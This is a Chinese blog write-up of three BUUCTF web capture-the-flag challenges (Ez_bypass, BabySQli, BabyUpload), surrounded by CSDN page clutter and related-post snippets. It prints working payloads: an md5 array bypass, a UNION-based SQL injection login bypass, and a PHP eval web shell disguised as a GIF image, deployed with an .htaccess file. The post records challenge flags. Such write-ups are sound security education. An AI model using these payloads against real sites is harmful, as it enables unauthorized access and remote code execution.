BUUCTF Web [MRCTF2020]Ez_bypass1 & [GXYCTF2019]BabySQli1 & [GXYCTF2019]BabyUpload1

已于 2022-12-08 11:52:29 修改
阅读量352 收藏
点赞数
分类专栏: BUUCTF Web 文章标签: 安全
于 2022-09-09 22:11:45 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64558270/article/details/126788753
版权

目录

[MRCTF2020]Ez_bypass1

[GXYCTF2019]BabySQli1

[GXYCTF2019]BabyUpload1

[MRCTF2020]Ez_bypass1

 启动靶机,右键查看源代码

代码审计,GET传两个参数:id 和 gg。POST传passwd。需要满足的条件:1.id和gg值不同,但md5(id)== md(gg);  2.passwd==1234567,但passwd不能纯数字 。

思路: id 和 gg 直接传两个不同数组(md5(数组)== NULL)  ,passwd传1234567abc

构造payload

GET:   /?id[]=1&gg[]=2
POST:  passwd=1234567abc

 拿到flag      flag{20097f40-8b61-451c-a588-56b65732a9ca}

[GXYCTF2019]BabySQli1

启动靶机,输个弱口令抓个包看看

发现一行注释的一行,复制到base32在线解密

再复制到base64在线解密

 估计是提示我们后端的sql语句

select * from user where username = '$name'

知道了username,但是不知道password在后端是怎样查询的。看了下大佬的wp,查询三个字段id,username,password,但我们穿的password有个md5加密,所以构造payload

name=-1' union select 1,'admin',NULL#&pw[]=1

传的pw是数组,md5[数组] = NULL

拿到flag          flag{42515684-4641-44ac-81d3-aa348b07fbbf}  

[GXYCTF2019]BabyUpload1

启动靶机,熟悉的文件上传,先上传个shell.php看看

 看来phtml绕黑名单也不可行了,尝试.pHp ,发现也不行。懒得尝试了,直接传图片马吧。

GIF89a
<script language=php>eval($_POST[1]);</script>

 forward放包

 由于上传的文件以jpg存储,所以恶意代码无法执行,需要再上传一个.htaccess文件

 再访问一下图片马

 感觉上传成功了,蚁剑连接

拿到flag         flag{bb2bcb49-44e2-4583-bf58-49a20306eedd} 

WmVicmE=
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
360webscan.php_bypass.pdf
03-18
PHP 网站安全-Bypass 360webscan_php_bypass 在 PHP 开发中,安全问题一直是一个重要的关注点。大多数网站都需要防止恶意攻击和漏洞利用,360webscan 是一种常用的网站安全扫描工具。然而,安全专家们也需要了解...
利用netplwiz.exe_Bypass_UAC1
08-03
标题 "利用netplwiz.exe_Bypass_UAC1" 描述了一个高级用户账户控制(User Account Control, UAC)的规避方法,通过Windows系统中的netplwiz.exe工具。这个方法涉及了对netplwiz.exe文件的特殊利用,该文件是Windows...
BUUCTF web [GXYCTF2019]BabyUpload1 详解
llki666的博客
08-27 2378
打开后是这样的, 遇到文件上传题,先传一张普通图片试试, 提到了上传类型,用burpsuite抓包可以修改上传类型。再试试上传一句话木马: 提到后缀名不能有ph,也用burp suite能改。 准备一个文本文档写一句话木马: <script language='php'>eval($_POST['v']);</script> 推荐用这个,可以避开很多坑。然后直接把文本的后缀名txt改成jpg就行。 上传试试: 成功!现在需要把上传成功...
BUUCTF:[GXYCTF2019]BabyUpload1
羽的博客
07-07 3036
文件上传漏洞。 不过这里我要吐槽一下,这个题首先他不允许传.png文件, 再者.jpg文件不能大,打了也报错,传不上去。 可想而知,我当时在做这个题的时候跟见了鬼一样难受,什么文件都传不了。 接着做题吧: 试着传一个PHP文件,告诉我不能传ph开头的文件后缀名,所以这里表示后端把所有php和php的别名都封死了。 根据之前upload-labs积累的绕过姿势,还可以上传.htaccess文件。 再次上传一句话木马时,又被拦截了,这里应该是后端检测了文件内容。盲猜检测<...
BUUCTF之[GXYCTF2019]BabyUpload-------文件解析漏洞
weixin_44632787的博客
06-19 1897
BUUCTF之[GXYCTF2019]BabyUpload-------文件解析漏洞(.htaccess) 早上遇到一个文件解析漏洞,下午又遇到一个。。。。好吧,看来文件解析漏洞在CTF中也是很重要的一个知识点!!! 首先启动挑战项目 先正常的上传一句话木马: GIF89a? <script language="php">eval($_POST['zyh']);</script> 我经常用这样的一句话木马,为了防止php文件内容被过滤啥的… 所以,把传输的文件名改回1.pn
BUUCTF 每日打卡 2021-9-5
weixin_52446095的博客
09-05 396
引言 假期的最后一天(其实已经是到学校的第二天了),明天就要开始上课了 今天打了打 GrabCON CTF2021 [GrabCON CTF2021]Warm-up 题目附件如下: S01ZRENXU1NJVkhGUVZKUkpaRkZNMlNLSTVKVENWU0xLVlZYQVlLVElaTkVVVlRNS0pIRkc2U1dKVkpHV01LWEtaQ1VVVENXTlJORlNVS1dOUkdGS01EVUs1S0dXVlNLS1pDWFFUQ1ROUllFT1VUTE1STFZDTUxFSk5M
密码学(Crypto)一些在线解密网站
热门推荐
Youzen_ing的博客
06-11 7万+
很多时候会用到加密,解密,下面就是一些链接
BypassDanielCorrea (1)_bypass_XignCode_
09-28
Bypass Daniel Correa Xigncode
Chat_Bypass (1)_chatbypass_
10-03
标题中的“Chat_Bypass (1)_chatbypass_”指的是一个针对Roblox游戏平台的聊天过滤规避工具。在Roblox中,为了维护游戏环境的和谐,官方实施了聊天过滤系统,限制了某些词汇的使用。Chat Bypass工具的目的是允许用户...
nac_bypass:脚本收集以绕过网络访问控制(NAC,802.1x)
01-31
标题中的“nac_bypass”指的是一个专门针对网络访问控制(NAC,Network Access Control)进行规避的技术集合,尤其关注802.1x标准。802.1x是一种基于端口的网络访问控制协议,常用于企业环境中,通过认证用户设备的...
base32编码解码
01-23
function getEncodeString(srcString) {              var BASE32CHAR = "ABCDEFGHIJKLMNOPQRSTUVWXYZ234567";        var i = 0;       var index = 0;
base32解码器
11-02
base32转换字符串,做CTF题会用到的..........................................................aaaaa
Base32加解密程序
11-12
提供对字符串进行Base32加密操作,以及可以对经过Base32加密的数据进行解密。
Base32_加密例子
08-31
Base32 的加密例子
密码学(Crypto)在线解密网站大全
哆啦安全
11-19 1万+
欢迎关注微信公众号 xssee http://web2hack.org/xssee xssee http://evilcos.me/lab/xssee 在线编码解码(多种并排) http://bianma.911cha.com 在线加密解密(多种) http://encode.chahuo.com Unicode转中文 http://www.bejson.com/conver..
python base64 32加解密
Amdy_amdy的博客
03-17 1021
来源:https://blog.csdn.net/just_h/article/details/72795088 base32/base64是一种常用的加密方式,拿到base64的密文后,我们虽然可以在某些网站上解码。但在没网络下的情况,我们可以运用python进行base32/base64解码,以下是python的代码 基于python2的加解密 #base32解码 import base64 print base64.b32decode("输入要解密的密文")
C语言 base32与base64加解密
最新发布
qq_36075612的博客
07-08 1599
C语言 base32与base64加解密
WhbtomT(半路出家) 的每日英语 收集 (二)
中海专栏
11-18 4678
 301、他易于满足。He is content with very little.302、早起三朝当一天。To get up early for three morning is equal to one day of time.303、病从口入。Diseases enter by the mouth.304、一寸黄金买不到一寸光阴。An inch of gold will no
BZOJ4134 ljw和lzr的hack比赛
neither_nor
12-09 1202
今年清华集训D1T1-_- 首先我们可以想到n^2的算法,我们对每个点记录一个sg[x],代表以x为根的子树的游戏的sg函数值,然后我们再对每个点记录rem[x],代表删掉从x到根的路径后剩余的游戏的sg值的异或和。 容易发现在我们计算x的sg值的时候,x的rem是他所有儿子的sg值的异或和,而对于x的每一个儿子y,y的子树里的所有rem值都会异或rem[x]^sg[y] 然后我们求第一个不
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

WmVicmE=

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值